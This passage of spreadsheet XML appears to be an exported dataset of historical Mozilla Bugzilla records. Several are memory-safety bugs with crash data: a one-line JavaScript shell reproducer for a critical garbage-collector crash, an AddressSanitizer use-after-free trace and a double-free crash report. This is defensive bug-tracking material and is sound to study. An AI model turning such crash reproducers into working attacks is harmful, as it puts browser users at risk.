      <c r="K4304" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4304" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4304" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4304" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4304" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4304" t="inlineStr">
        <is>
          <t>[sg:critical] regression from 308429</t>
        </is>
      </c>
      <c r="Q4304" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4304" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4304" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4304" t="n">
        <v>1</v>
      </c>
      <c r="U4304" t="n">
        <v>0</v>
      </c>
      <c r="V4304" t="n">
        <v>17</v>
      </c>
      <c r="W4304" t="inlineStr">
        <is>
          <t>js&gt; www = &lt;x&gt;&lt;y/&gt;&lt;/x&gt;; print(uneval(this) + "\n"); gc();
({www:#1=&lt;x&gt;
  &lt;y/&gt;
&lt;/x&gt;})
Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_INVALID_ADDRESS (0x0001) at 0xdddddc00
Thread 0 Crashed:
0   js 	0x00053264 js_GetGCThingFlags + 26 (jsgc.c:512)
1   js 	0x00055663 JS_CallTracer + 495 (jsgc.c:2146)
2   js 	0x0008696b js_TraceObject + 811 (jsobj.c:4898)
3   js 	0x000548ec JS_TraceChildren + 140 (jsgc.c:1812)
4   js 	0x0005577d JS_CallTracer + 777 (jsgc.c:2172)
5   js 	0x0008696b js_TraceObject + 811 (jsobj.c:4898)
6   js 	0x000548ec JS_TraceChildren + 140 (jsgc.c:1812)
7   js 	0x0005577d JS_CallTracer + 777 (jsgc.c:2172)
8   js 	0x00055ccb js_TraceStackFrame + 355 (jsgc.c:2333)
9   js 	0x0005639a js_TraceContext + 124 (jsgc.c:2445)
10  js 	0x000568d5 js_TraceRuntime + 179 (jsgc.c:2519)
11  js 	0x00056b3b js_GC + 530 (jsgc.c:2747)
12  js 	0x000161a7 JS_GC + 96 (jsapi.c:2372)
13  js 	0x000037f6 GC + 45 (js.c:742)
14  js 	0x00059941 js_Invoke + 2945 (jsinterp.c:1332)
15  js 	0x0006a376 js_Interpret + 62065 (jsinterp.c:4025)
16  js 	0x0005a295 js_Execute + 715 (jsinterp.c:1591)
17  js 	0x0001b02f JS_ExecuteScript + 54 (jsapi.c:4692)
18  js 	0x00002692 Process + 912 (js.c:268)
19  js 	0x0000309b ProcessArgs + 2045 (js.c:519)
20  js 	0x00007fb0 main + 612 (js.c:3256)
21  js 	0x000021a6 _start + 216
22  js 	0x000020cd start + 41</t>
        </is>
      </c>
      <c r="X4304" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4305">
      <c r="A4305" t="n">
        <v>787831</v>
      </c>
      <c r="B4305" t="inlineStr">
        <is>
          <t>2012-09-02 13:31:33 -0700</t>
        </is>
      </c>
      <c r="C4305" t="inlineStr">
        <is>
          <t>Heap-use-after-free in mozilla::TrackUnionStream::EndTrack</t>
        </is>
      </c>
      <c r="D4305" t="inlineStr">
        <is>
          <t>2024-05-30 07:32:56 -0700</t>
        </is>
      </c>
      <c r="E4305" t="n">
        <v>1</v>
      </c>
      <c r="F4305" t="n">
        <v>1</v>
      </c>
      <c r="G4305" t="n">
        <v>3</v>
      </c>
      <c r="H4305" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4305" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4305" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K4305" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4305" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4305" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4305" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4305" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4305" t="inlineStr">
        <is>
          <t>[asan][adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q4305" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4305" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4305" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T4305" t="n">
        <v>1</v>
      </c>
      <c r="U4305" t="n">
        <v>0</v>
      </c>
      <c r="V4305" t="n">
        <v>22</v>
      </c>
      <c r="W4305" t="inlineStr">
        <is>
          <t>Created attachment 657709
Testcase
Reproduces on trunk
MediaStreamGraphImpl::FinishStream
MediaStreamGraphImpl::FinishStream
nsBuiltinDecoderStateMachine::RunStateMachine queuing nsBuiltinDecoder::PlaybackEnded
=================================================================
==26602== ERROR: AddressSanitizer heap-use-after-free on address 0x7f9ea7933198 at pc 0x7f9ec9a0034e bp 0x7f9e8f5ea310 sp 0x7f9e8f5ea308
READ of size 1 at 0x7f9ea7933198 thread T14
    #0 0x7f9ec9a0034d in mozilla::StreamBuffer::Track::IsEnded() const src/content/media/StreamBuffer.h:125
    #1 0x7f9ec9a03db5 in mozilla::TrackUnionStream::EndTrack(unsigned int) src/content/media/TrackUnionStream.h:148
    #2 0x7f9ec99ff3e8 in mozilla::TrackUnionStream::ProduceOutput(long, long) src/content/media/TrackUnionStream.h:83
    #3 0x7f9ec99bd827 in mozilla::MediaStreamGraphImpl::RunThread() src/content/media/MediaStreamGraph.cpp:1395
    #4 0x7f9ec9a1b272 in mozilla::(anonymous namespace)::MediaStreamGraphThreadRunnable::Run() src/content/media/MediaStreamGraph.cpp:1510
    #5 0x7f9ecfa2949e in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:624
    #6 0x7f9ecf6ca877 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #7 0x7f9ecfa213c5 in nsThread::ThreadFunc(void*) src/xpcom/threads/nsThread.cpp:257
    #8 0x7f9edea519c3 in _pt_root src/nsprpub/pr/src/pthreads/ptthread.c:156
    #9 0x4c6f8b in __asan::AsanThread::ThreadStart() ??:0
0x7f9ea7933198 is located 24 bytes inside of 32-byte region [0x7f9ea7933180,0x7f9ea79331a0)
freed by thread T14 here:
    #0 0x4c3e30 in free ??:0
    #1 0x7f9edc76d572 in moz_free src/memory/mozalloc/mozalloc.cpp:51
    #2 0x7f9ec99f668e in operator delete(void*) src/../../dist/include/mozilla/mozalloc.h:224
    #3 0x7f9ec99f64c2 in ~nsAutoPtr src/../../dist/include/nsAutoPtr.h:70
    #4 0x7f9ec99f63b2 in nsTArrayElementTraits&lt;nsAutoPtr&lt;mozilla::StreamBuffer::Track&gt; &gt;::Destruct(nsAutoPtr&lt;mozilla::StreamBuffer::Track&gt;*) src/../../dist/include/nsTArray.h:348
    #5 0x7f9ec99f60b3 in nsTArray&lt;nsAutoPtr&lt;mozilla::StreamBuffer::Track&gt;, nsTArrayDefaultAllocator&gt;::DestructRange(unsigned int, unsigned int) src/../../dist/include/nsTArray.h:1213
    #6 0x7f9ec99f5b5c in nsTArray&lt;nsAutoPtr&lt;mozilla::StreamBuffer::Track&gt;, nsTArrayDefaultAllocator&gt;::RemoveElementsAt(unsigned int, unsigned int) src/../../dist/include/nsTArray.h:933
    #7 0x7f9ec9b0dc58 in nsTArray&lt;nsAutoPtr&lt;mozilla::StreamBuffer::Track&gt;, nsTArrayDefaultAllocator&gt;::RemoveElementAt(unsigned int) src/../../dist/include/nsTArray.h:939
    #8 0x7f9ec9b0d630 in mozilla::StreamBuffer::ForgetUpTo(long) src/content/media/StreamBuffer.cpp:51
    #9 0x7f9ec99cff93 in mozilla::MediaStream::AdvanceTimeVaryingValuesToCurrentTime(long, long) src/content/media/MediaStreamGraph.h:385
    #10 0x7f9ec99a441b in mozilla::MediaStreamGraphImpl::UpdateCurrentTime() src/content/media/MediaStreamGraph.cpp:816
    #11 0x7f9ec99bc7da in mozilla::MediaStreamGraphImpl::RunThread() src/content/media/MediaStreamGraph.cpp:1352
    #12 0x7f9ec9a1b272 in mozilla::(anonymous namespace)::MediaStreamGraphThreadRunnable::Run() src/content/media/MediaStreamGraph.cpp:1510
    #13 0x7f9ecfa2949e in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:624
    #14 0x7f9ecf6ca877 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #15 0x7f9ecfa213c5 in nsThread::ThreadFunc(void*) src/xpcom/threads/nsThread.cpp:257
    #16 0x7f9edea519c3 in _pt_root src/nsprpub/pr/src/pthreads/ptthread.c:156
    #17 0x4c6f8b in __asan::AsanThread::ThreadStart() ??:0
previously allocated by thread T14 here:
    #0 0x4c3ef0 in __interceptor_malloc ??:0
    #1 0x7f9edc76d6c6 in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:57
    #2 0x7f9ec999de8d in operator new(unsigned long) src/../../dist/include/mozilla/mozalloc.h:200
    #3 0x7f9ec9a0343f in mozilla::TrackUnionStream::AddTrack(mozilla::MediaInputPort*, mozilla::StreamBuffer::Track*, long) src/content/media/TrackUnionStream.h:133
    #4 0x7f9ec99fefd2 in mozilla::TrackUnionStream::ProduceOutput(long, long) src/content/media/TrackUnionStream.h:74
    #5 0x7f9ec99bd827 in mozilla::MediaStreamGraphImpl::RunThread() src/content/media/MediaStreamGraph.cpp:1395
    #6 0x7f9ec9a1b272 in mozilla::(anonymous namespace)::MediaStreamGraphThreadRunnable::Run() src/content/media/MediaStreamGraph.cpp:1510
    #7 0x7f9ecfa2949e in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:624
    #8 0x7f9ecf6ca877 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #9 0x7f9ecfa213c5 in nsThread::ThreadFunc(void*) src/xpcom/threads/nsThread.cpp:257
    #10 0x7f9edea519c3 in _pt_root src/nsprpub/pr/src/pthreads/ptthread.c:156
    #11 0x4c6f8b in __asan::AsanThread::ThreadStart() ??:0
Thread T14 created by T0 here:
    #0 0x4c0284 in pthread_create ??:0
    #1 0x7f9edea42ac9 in _PR_CreateThread src/nsprpub/pr/src/pthreads/ptthread.c:393
    #2 0x7f9edea40bc2 in PR_CreateThread src/nsprpub/pr/src/pthreads/ptthread.c:476
    #3 0x7f9ecfa244e9 in nsThread::Init() src/xpcom/threads/nsThread.cpp:323
    #4 0x7f9ecfa3b463 in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) src/xpcom/threads/nsThreadManager.cpp:215
    #5 0x7f9ecf6c7d2a in NS_NewThread_P(nsIThread**, nsIRunnable*, unsigned int) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:49
    #6 0x7f9ec99c0938 in mozilla::MediaStreamGraphImpl::RunInStableState() src/content/media/MediaStreamGraph.cpp:1617
    #7 0x7f9ec9a1ad14 in mozilla::(anonymous namespace)::MediaStreamGraphStableStateRunnable::Run() src/content/media/MediaStreamGraph.cpp:1544
    #8 0x7f9ecd95c352 in nsBaseAppShell::RunSyncSectionsInternal(bool, unsigned int) src/widget/xpwidgets/nsBaseAppShell.cpp:352
    #9 0x7f9ecd95833d in nsBaseAppShell::RunSyncSections(bool, unsigned int) src/widget/xpwidgets/nsBaseAppShell.h:89
    #10 0x7f9ecd95dcd0 in nsBaseAppShell::AfterProcessNextEvent(nsIThreadInternal*, unsigned int) src/widget/xpwidgets/nsBaseAppShell.cpp:408
    #11 0x7f9ecd95dd84 in non-virtual thunk to nsBaseAppShell::AfterProcessNextEvent(nsIThreadInternal*, unsigned int) src/gfx/cairo/cairo/src/cairo-surface-subsurface.c:0
    #12 0x7f9ecfa298b8 in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:637
    #13 0x7f9ecf6ca877 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #14 0x7f9ece493515 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #15 0x7f9ecfcd4099 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:208
    #16 0x7f9ecfcd3ee2 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:201
    #17 0x7f9ecfcd3dc7 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:175
    #18 0x7f9ecd95864e in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #19 0x7f9ecc5be178 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:273
    #20 0x7f9ec2dd1450 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3835
    #21 0x7f9ec2dd76c4 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3912
    #22 0x7f9ec2dda78e in XRE_main src/toolkit/xre/nsAppRunner.cpp:3988
    #23 0x40c5bb in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #24 0x409e1f in main src/browser/app/nsBrowserApp.cpp:279
    #25 0x7f9edf8cfc4d in ?? ??:0
Shadow byte and word:
  0x1ff3d4f26633: fd
  0x1ff3d4f26630: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ff3d4f26610: 00 00 02 fb fb fb fb fb
  0x1ff3d4f26618: fb fb fb fb fb fb fb fb
  0x1ff3d4f26620: fa fa fa fa fa fa fa fa
  0x1ff3d4f26628: fa fa fa fa fa fa fa fa
=&gt;0x1ff3d4f26630: fd fd fd fd fd fd fd fd
  0x1ff3d4f26638: fd fd fd fd fd fd fd fd
  0x1ff3d4f26640: fa fa fa fa fa fa fa fa
  0x1ff3d4f26648: fa fa fa fa fa fa fa fa
  0x1ff3d4f26650: fd fd fd fd fd fd fd fd
Stats: 282M malloced (279M for red zones) by 392075 calls
Stats: 43M realloced by 22062 calls
Stats: 239M freed by 253504 calls
Stats: 98M really freed by 176236 calls
Stats: 488M (125019 full pages) mmaped in 122 calls
  mmaps   by size class: 8:245745; 9:40955; 10:16380; 11:14329; 12:3072; 13:1536; 14:1280; 15:256; 16:448; 17:1248; 18:144; 19:152; 20:16;
  mallocs by size class: 8:296665; 9:50967; 10:17702; 11:17532; 12:2750; 13:1931; 14:1873; 15:343; 16:557; 17:1418; 18:169; 19:151; 20:17;
  frees   by size class: 8:177303; 9:40842; 10:13985; 11:14149; 12:1762; 13:1413; 14:1646; 15:291; 16:497; 17:1398; 18:57; 19:147; 20:14;
  rfrees  by size class: 8:130433; 9:23363; 10:9030; 11:9935; 12:870; 13:705; 14:725; 15:168; 16:347; 17:626; 18:28; 19:5; 20:1;
Stats: malloc large: 1755 small slow: 2053
==26602== ABORTING</t>
        </is>
      </c>
      <c r="X4305" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4306">
      <c r="A4306" t="n">
        <v>615375</v>
      </c>
      <c r="B4306" t="inlineStr">
        <is>
          <t>2010-11-29 15:23:00 -0800</t>
        </is>
      </c>
      <c r="C4306" t="inlineStr">
        <is>
          <t>Always redirect to HTTPS after login</t>
        </is>
      </c>
      <c r="D4306" t="inlineStr">
        <is>
          <t>2010-12-10 13:42:21 -0800</t>
        </is>
      </c>
      <c r="E4306" t="n">
        <v>1</v>
      </c>
      <c r="F4306" t="n">
        <v>1</v>
      </c>
      <c r="G4306" t="n">
        <v>5</v>
      </c>
      <c r="H4306" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4306" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4306" t="inlineStr">
        <is>
          <t>Users and Groups</t>
        </is>
      </c>
      <c r="K4306" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4306" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4306" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4306" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4306" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4306" t="inlineStr"/>
      <c r="Q4306" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4306" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4306" t="inlineStr">
        <is>
          <t>2.4</t>
        </is>
      </c>
      <c r="T4306" t="n">
        <v>1</v>
      </c>
      <c r="U4306" t="n">
        <v>0</v>
      </c>
      <c r="V4306" t="n">
        <v>3</v>
      </c>
      <c r="W4306" t="inlineStr">
        <is>
          <t>After login we need to always end up on HTTPS, even if we're falling back to the referer as a target.</t>
        </is>
      </c>
      <c r="X4306" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4307">
      <c r="A4307" t="n">
        <v>583614</v>
      </c>
      <c r="B4307" t="inlineStr">
        <is>
          <t>2010-08-01 11:38:57 -0700</t>
        </is>
      </c>
      <c r="C4307" t="inlineStr">
        <is>
          <t>Simple Search no longer works</t>
        </is>
      </c>
      <c r="D4307" t="inlineStr">
        <is>
          <t>2010-08-04 10:15:46 -0700</t>
        </is>
      </c>
      <c r="E4307" t="n">
        <v>1</v>
      </c>
      <c r="F4307" t="n">
        <v>1</v>
      </c>
      <c r="G4307" t="n">
        <v>4</v>
      </c>
      <c r="H4307" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4307" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4307" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K4307" t="inlineStr">
        <is>
          <t>4.1</t>
        </is>
      </c>
      <c r="L4307" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4307" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4307" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4307" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4307" t="inlineStr"/>
      <c r="Q4307" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4307" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4307" t="inlineStr">
        <is>
          <t>Bugzilla 4.2</t>
        </is>
      </c>
      <c r="T4307" t="n">
        <v>1</v>
      </c>
      <c r="U4307" t="n">
        <v>0</v>
      </c>
      <c r="V4307" t="n">
        <v>5</v>
      </c>
      <c r="W4307" t="inlineStr">
        <is>
          <t>Simple Search in 4.1 is totally broken. You always get this error:
The "content" field can only be used with "matches" search and the "matches" search can only be used with the "content" field.
Bugzilla 3.7.2+ is not affected.</t>
        </is>
      </c>
      <c r="X4307" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4308">
      <c r="A4308" t="n">
        <v>1263715</v>
      </c>
      <c r="B4308" t="inlineStr">
        <is>
          <t>2016-04-11 12:59:04 -0700</t>
        </is>
      </c>
      <c r="C4308" t="inlineStr">
        <is>
          <t>Enable crash symbol handling on functional tests (at least in automation)</t>
        </is>
      </c>
      <c r="D4308" t="inlineStr">
        <is>
          <t>2016-05-19 02:14:50 -0700</t>
        </is>
      </c>
      <c r="E4308" t="n">
        <v>1</v>
      </c>
      <c r="F4308" t="n">
        <v>1</v>
      </c>
      <c r="G4308" t="n">
        <v>6</v>
      </c>
      <c r="H4308" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4308" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J4308" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K4308" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4308" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4308" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4308" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4308" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4308" t="inlineStr"/>
      <c r="Q4308" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4308" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4308" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4308" t="n">
        <v>1</v>
      </c>
      <c r="U4308" t="n">
        <v>0</v>
      </c>
      <c r="V4308" t="n">
        <v>7</v>
      </c>
      <c r="W4308" t="inlineStr">
        <is>
          <t>Currently when a Firefox crashes when we're running functional tests, we currently don't get any stack or symbols.
We need to get the tests informed about the crash symbols, so we can get a meaningful stack.</t>
        </is>
      </c>
      <c r="X4308" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4309">
      <c r="A4309" t="n">
        <v>205378</v>
      </c>
      <c r="B4309" t="inlineStr">
        <is>
          <t>2003-05-12 12:48:50 -0700</t>
        </is>
      </c>
      <c r="C4309" t="inlineStr">
        <is>
          <t>Meta bug for changes in bookmarks sorting code</t>
        </is>
      </c>
      <c r="D4309" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E4309" t="n">
        <v>1</v>
      </c>
      <c r="F4309" t="n">
        <v>1</v>
      </c>
      <c r="G4309" t="n">
        <v>2</v>
      </c>
      <c r="H4309" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4309" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J4309" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K4309" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4309" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4309" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4309" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4309" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4309" t="inlineStr">
        <is>
          <t>[a=sspitzer, a=asa]</t>
        </is>
      </c>
      <c r="Q4309" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4309" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4309" t="inlineStr">
        <is>
          <t>mozilla1.4final</t>
        </is>
      </c>
      <c r="T4309" t="n">
        <v>1</v>
      </c>
      <c r="U4309" t="n">
        <v>1</v>
      </c>
      <c r="V4309" t="n">
        <v>44</v>
      </c>
      <c r="W4309" t="inlineStr">
        <is>
          <t>This should cover all work I've done to fix some long standing issues with
sorting in bookmarks, and some other problems as well.
I'll add dependencies later.</t>
        </is>
      </c>
      <c r="X4309" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4310">
      <c r="A4310" t="n">
        <v>1888333</v>
      </c>
      <c r="B4310" t="inlineStr">
        <is>
          <t>2024-03-27 21:09:51 -0700</t>
        </is>
      </c>
      <c r="C4310" t="inlineStr">
        <is>
          <t>Double-free in [@ SkRefCntBase::unref]</t>
        </is>
      </c>
      <c r="D4310" t="inlineStr">
        <is>
          <t>2024-09-18 19:36:53 -0700</t>
        </is>
      </c>
      <c r="E4310" t="n">
        <v>1</v>
      </c>
      <c r="F4310" t="n">
        <v>1</v>
      </c>
      <c r="G4310" t="n">
        <v>3</v>
      </c>
      <c r="H4310" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4310" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4310" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4310" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4310" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4310" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4310" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4310" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4310" t="inlineStr">
        <is>
          <t>[adv-main125+r][adv-esr115.10+r]</t>
        </is>
      </c>
      <c r="Q4310" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4310" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4310" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T4310" t="n">
        <v>1</v>
      </c>
      <c r="U4310" t="n">
        <v>0</v>
      </c>
      <c r="V4310" t="n">
        <v>12</v>
      </c>
      <c r="W4310" t="inlineStr">
        <is>
          <t>Crash report: https://crash-stats.mozilla.org/report/index/8dd342a4-8f6c-401a-a9bb-a7ab60240308
Reason: ```SIGSEGV / SEGV_ACCERR```
Top 10 frames of crashing thread:
```
0  libxul.so  std::__atomic_base&lt;int&gt;::fetch_add  /usr/include/c++/11/bits/atomic_base.h:618
0  libxul.so  SkRefCntBase::unref const  /build/firefox/parts/firefox/build/gfx/skia/skia/include/core/SkRefCnt.h:75
0  libxul.so  SkSafeUnref&lt;SkShader&gt;  /build/firefox/parts/firefox/build/gfx/skia/skia/include/core/SkRefCnt.h:151
0  libxul.so  sk_sp&lt;SkShader&gt;::~sk_sp  /build/firefox/parts/firefox/build/gfx/skia/skia/include/core/SkRefCnt.h:256
0  libxul.so  SkPaint::~SkPaint  /build/firefox/parts/firefox/build/gfx/skia/skia/src/core/SkPaint.cpp:60
1  libxul.so  mozilla::gfx::DrawTargetSkia::Mask  /build/firefox/parts/firefox/build/gfx/2d/DrawTargetSkia.cpp:1424
2  libxul.so  mozilla::gfx::DrawTargetWebgl::DrawRectFallback  /build/firefox/parts/firefox/build/dom/canvas/DrawTargetWebgl.cpp:1832
3  libxul.so  mozilla::gfx::DrawTargetWebgl::DrawRect  /build/firefox/parts/firefox/build/dom/canvas/DrawTargetWebgl.cpp:1814
4  libxul.so  mozilla::gfx::DrawTargetWebgl::MaskSurface  /build/firefox/parts/firefox/build/dom/canvas/DrawTargetWebgl.cpp:3723
5  libxul.so  mozilla::gfx::RecordedMaskSurface::PlayEvent const  /build/firefox/parts/firefox/build/gfx/2d/RecordedEventImpl.h:4069
```
This is a PHC-annotated crash, it is an access into a field 8 bytes into an 80byte structure allocated at: 0x7f1e61afbfb0  It was allocated at:
```
#0    malloc (firefox)
#1    moz_xmalloc (firefox)
#2    sk_make_sp&lt;SkImageShader, sk_sp&lt;SkImage&gt;, SkRect const&amp;, SkTileMode&amp;, SkTileMode&amp;, SkSamplingOptions const&amp;, bool, bool&amp;&gt;(sk_sp&lt;SkImage&gt;, SkRect const&amp;, SkTileMode&amp;, SkTileMode&amp;, SkSamplingOptions const&amp;, bool, bool&amp;) (libxul.so)
#3    SkLocalMatrixShader::MakeWrapped&lt;SkImageShader, sk_sp&lt;SkImage&gt;, SkRect const&amp;, SkTileMode&amp;, SkTileMode&amp;, SkSamplingOptions const&amp;, bool, bool&amp;&gt;(SkMatrix const*, sk_sp&lt;SkImage&gt;, SkRect const&amp;, SkTileMode&amp;, SkTileMode&amp;, SkSamplingOptions const&amp;, bool, bool&amp;) (libxul.so)
#4    SkImageShader::MakeSubset(sk_sp&lt;SkImage&gt;, SkRect const&amp;, SkTileMode, SkTileMode, SkSamplingOptions const&amp;, SkMatrix const*, bool) (libxul.so)
#5    SkImageShader::Make(sk_sp&lt;SkImage&gt;, SkTileMode, SkTileMode, SkSamplingOptions const&amp;, SkMatrix const*, bool) (libxul.so)
#6    SkImage::makeShader(SkTileMode, SkTileMode, SkSamplingOptions const&amp;, SkMatrix const&amp;) const (libxul.so)
#7    mozilla::gfx::SetPaintPattern(SkPaint&amp;, mozilla::gfx::Pattern const&amp;, mozilla::Maybe&lt;mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; &gt;&amp;, float, SkMatrix const*, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const*) (libxul.so)
#8    mozilla::gfx::DrawTargetSkia::Mask(mozilla::gfx::Pattern const&amp;, mozilla::gfx::Pattern const&amp;, mozilla::gfx::DrawOptions const&amp;) (libxul.so)
#9    mozilla::gfx::DrawTargetWebgl::DrawRectFallback(mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::Pattern const&amp;, mozilla::gfx::DrawOptions const&amp;, mozilla::Maybe&lt;mozilla::gfx::DeviceColor&gt;, bool, bool, mozilla::gfx::StrokeOptions const*) (libxul.so)
#10    mozilla::gfx::DrawTargetWebgl::DrawRect(mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::Pattern const&amp;, mozilla::gfx::DrawOptions const&amp;, mozilla::Maybe&lt;mozilla::gfx::DeviceColor&gt;, RefPtr&lt;mozilla::gfx::TextureHandle&gt;*, bool, bool, bool, bool, mozilla::gfx::StrokeOptions const*) (libxul.so)
